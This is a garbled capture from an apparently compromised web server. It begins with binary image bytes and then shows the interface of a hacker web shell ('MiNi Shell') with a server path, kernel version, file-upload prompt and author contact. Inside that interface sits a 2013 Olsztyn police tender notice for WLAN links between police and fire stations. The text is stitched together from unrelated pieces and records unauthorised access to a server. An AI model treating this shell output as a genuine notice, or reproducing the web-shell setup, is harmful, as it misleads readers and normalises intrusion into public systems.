JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131008/407202-N-2013.html

<p class="kh_header"><b>Olsztyn: Dostawa, montaż i uruchomienie 7 łączy transmisyjnych sieci radiowej WLAN w celu dołączenia jednostek Państwowej Straży Pożarnej do węzłów sieci OST-112</b><br>
<b>Numer ogłoszenia: 407202 - 2013; data zamieszczenia: 08.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Partyzantów 6/8, 10-521 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5225200, 5225760, faks 089 5225205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warminsko-mazurska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż i uruchomienie 7 łączy transmisyjnych sieci radiowej WLAN w celu dołączenia jednostek Państwowej Straży Pożarnej do węzłów sieci OST-112.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa, montaż i uruchomienie 7 łączy transmisyjnych sieci radiowej WLAN, na potrzeby jednostek Państwowej Straży Pożarnej do węzłów sieci OST-112.
2.	  Zamawiający dopuszcza składanie ofert na dowolną ilość części (zadań), zgodnie z poniższym podziałem:

zadanie nr 1
uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji  w Bartoszycach, ul. Warszawska 9, a Komenda Powiatowa Państwowej Straży Pożarnej w Bartoszycach, ul. Bema 36;

zadanie nr 2
uruchomienie łącza radioliniowego w relacji Komenda Miejska Policji w Elblągu, ul. Tysiąclecia 3, a Komenda Miejska Państwowej Straży Pożarnej  w Elblągu, ul. Bema 17;

zadanie nr 3
uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji w Ełku, ul. Chopina 10, a Komenda Powiatowa Państwowej Straży Pożarnej w Ełku, ul. Piłsudskiego 1;

zadanie nr 4
uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji w Lidzbarku Warmińskim, 
ul. Warmińska 8, a Komenda Powiatowa Państwowej Straży Pożarnej w Lidzbarku Warmińskim, ul. Olsztyńska 8;

zadanie nr 5
uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji w Ostródzie, ul. Handlowa 6, 
a Komenda Powiatowa Państwowej Straży Pożarnej w Ostródzie, ul. Stapińskiego 19 C;

zadanie nr 6
uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji w Piszu, ul. Armii Krajowej 1, 
a Komenda Powiatowa Państwowej Straży Pożarnej w Piszu, ul. Olsztyńska 40 A;

zadanie nr 7
uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji w Szczytnie, ul. Piłsudskiego 39, 
a Komenda Powiatowa Państwowej Straży Pożarnej w Szczytnie, ul. Sobieszczańskiego 2;

3.	Szczegółowe określenie zakresu przedmiotu zamówienia zawarte jest w Opisie przedmiotu zamówienia, stanowiącym Załącznik Nr 5 do specyfikacji istotnych warunków zamówienia, zwanej dalej SIWZ.
5.	Zamawiający dopuszcza możliwość realizacji części zamówienia przy pomocy podwykonawców. Wykonawca zobligowany jest wskazać w ofercie część zamówienia powierzoną do realizacji w ramach podwykonawstwa, zgodnie ze wzorem stanowiącym Załącznik nr 9 do SIWZ.
6.	Zamawiający nie dopuszcza składania ofert wariantowych oraz nie przewiduje udzielania zaliczek na   poczet wykonania zamówienia.
7.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 ustawy Pzp.
8.	 Zamawiający nie przewiduje zawarcia umowy ramowej.
9.	 Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne.
10.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
11.	Określenie elementu przedmiotu zamówienia, poprzez wskazanie nazwy producenta, typu urządzenia, sprzętu lub materiałów, ma wyłącznie na celu doprecyzowanie elementów przedmiotu zamówienia. Zamawiający dopuszcza możliwość zastosowania rozwiązań równoważnych, pod warunkiem, że zaproponowane rozwiązania równoważne będą posiadały  parametry techniczne i użytkowe nie gorsze niż te, które są określone w dokumentach. Ze względów użytkowych, technicznych lub finansowych, w trakcie realizacji umowy Zamawiający zastrzega sobie możliwość zmiany zakładanych rozwiązań materiałowych i technologicznych w uzgodnieniu z Wykonawcą..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.34.42.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawców wniesienia wadium. Zamawiający określa wadium na kwotę: 
a)	w zadaniu nr 1 - 1.000,00 PLN 
b)	w zadaniu nr 2 - 1.000,00 PLN 
c)	w zadaniu nr 3 - 1.000,00 PLN
d)	w zadaniu nr 4 - 1.000,00 PLN
e)	w zadaniu nr 5 - 1.000,00 PLN
f)	w zadaniu nr 6 - 1.000,00 PLN
g)	w zadaniu nr 7 - 1.000,00 PLN
Łączna kwota wadium wynosi: 7.000,00 PLN (słownie: siedem tysięcy 00/100 złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeśli Wykonawca wykaże, że posiada aktualne zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeśli Wykonawca wykaże się wykonaniem w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednej dostawy polegającej na dostawie, montażu i uruchomieniu łączy transmisyjnych wykonanych w technologii radiolinii o wartości minimum 70.000,00 złotych brutto, wraz z podaniem wartości, przedmiotu zamówienia, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączenie dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Na podstawie § 6 ust. 1 pkt. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich dokumenty te mogą być składane (Dz. U. z 2013 r. poz. 231), Zamawiający żąda dołączenia do oferty wykazu z opisem  oferowanego sprzętu (typ, model, producent) wraz ze specyfikacją techniczną urządzeń podpisane przez Wykonawcę na jego odpowiedzialność, potwierdzające, że oferowany sprzęt spełnia wymagania Zamawiającego, określone w Załączniku nr 5 do SIWZ.
	Na podstawie § 7 ust. 4 cytowanego Rozporządzenia - dokumenty, sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy w stosunku do treści oferty możliwa jest w następujących przypadkach i na zasadach w nich określonych:
a)nastąpiła zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę,     
b)nastąpiła zmiana w aktach prawnych regulujących przedmiot zamówienia,
1) Przesunięcie terminu wykonania przedmiotu umowy w przypadku:
a) działania zewnętrznego o charakterze siły wyższej niemożliwe do przewidzenia, a mającego bezpośredni wpływ na terminowość wykonywania robót,
b) awarii obiektów lub urzadzeń w których odbywać się będzie realizacja zamówienia, które wystąpiły z przyczyn niezależnych od Wykonawcy, a które umiemożliwiają prawidłowe wykonanie przedmiotu zamówienia,
c) innych zdarzeń, na które Strony nie mają wpływu, lecz które utrudniają pełne lub częściowe wypełnienie zobowiązań umownych i których nie da się uniknąć nawet w przypadku zachowania maksymalnej staranności obu Stron.
2) Zamawiający dopuszcza możliwość wprowadzenia zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej, pod warunkiem że zmiany te będą korzystne dla Zamawiającego. Będą to np. okoliczności:
a) powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy,
b) powodujące poprawienie parametrów technicznych,
c) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.
Dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej, pod warunkiem że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.

2.	Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią one zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i Wykonawcę.
3.	Wszelkie zmiany i uzupełnienia niniejszej umowy wymagają dla swej ważności formy pisemnej pod    rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warminsko-mazurska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji
Sekcja Zamówień Publicznych i Funduszy Pomocowych
ul. Partyzantów 6-8, 10-521 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2013 godzina 13:00, miejsce: Komenda Wojewódzka Policji
Sekcja Zamówień Publicznych i Funduszy Pomocowych
ul. Partyzantów 6-8, 10-521 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> relacja Komenda Powiatowa Policji  w Bartoszycach, ul. Warszawska 9, a Komenda Powiatowa Państwowej Straży Pożarnej w Bartoszycach, ul. Bema 36;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji  w Bartoszycach, ul. Warszawska 9, a Komenda Powiatowa Państwowej Straży Pożarnej w Bartoszycach, ul. Bema 36;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.34.42.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> relacja Komenda Miejska Policji 
w Elblągu, ul. Tysiąclecia 3, a Komenda Miejska Państwowej Straży Pożarnej 
w Elblągu, ul. Bema 17;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> uruchomienie łącza radioliniowego w relacji Komenda Miejska Policji 
w Elblągu, ul. Tysiąclecia 3, a Komenda Miejska Państwowej Straży Pożarnej 
w Elblągu, ul. Bema 17;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.24.42.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> relacja Komenda Powiatowa Policji 
w Ełku, ul. Chopina 10, a Komenda Powiatowa Państwowej Straży Pożarnej 
w Ełku, ul. Piłsudskiego 1;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji 
w Ełku, ul. Chopina 10, a Komenda Powiatowa Państwowej Straży Pożarnej 
w Ełku, ul. Piłsudskiego 1;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.34.42.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> relacja Komenda Powiatowa Policji 
w Lidzbarku Warmińskim, ul. Warmińska 8, a Komenda Powiatowa Państwowej Straży Pożarnej w Lidzbarku Warmińskim, ul. Olsztyńska 8;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji 
w Lidzbarku Warmińskim, ul. Warmińska 8, a Komenda Powiatowa Państwowej Straży Pożarnej w Lidzbarku Warmińskim, ul. Olsztyńska 8;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.34.42.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> relacja Komenda Powiatowa Policji 
w Ostródzie, ul. Handlowa 6, a Komenda Powiatowa Państwowej Straży Pożarnej 
w Ostródzie, ul. Stapińskiego 19 C;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji 
w Ostródzie, ul. Handlowa 6, a Komenda Powiatowa Państwowej Straży Pożarnej 
w Ostródzie, ul. Stapińskiego 19 C;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.34.42.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> relacja Komenda Powiatowa Policji 
w Piszu, ul. Armii Krajowej 1, a Komenda Powiatowa Państwowej Straży Pożarnej 
w Piszu, ul. Olsztyńska 40 A;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji 
w Piszu, ul. Armii Krajowej 1, a Komenda Powiatowa Państwowej Straży Pożarnej 
w Piszu, ul. Olsztyńska 40 A;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.34.42.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> relacja Komenda Powiatowa Policji 
w Szczytnie, ul. Piłsudskiego 39, a Komenda Powiatowa Państwowej Straży Pożarnej w Szczytnie, ul. Sobieszczańskiego 2;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> uruchomienie łącza radioliniowego w relacji Komenda Powiatowa Policji 
w Szczytnie, ul. Piłsudskiego 39, a Komenda Powiatowa Państwowej Straży Pożarnej w Szczytnie, ul. Sobieszczańskiego 2;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.34.42.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com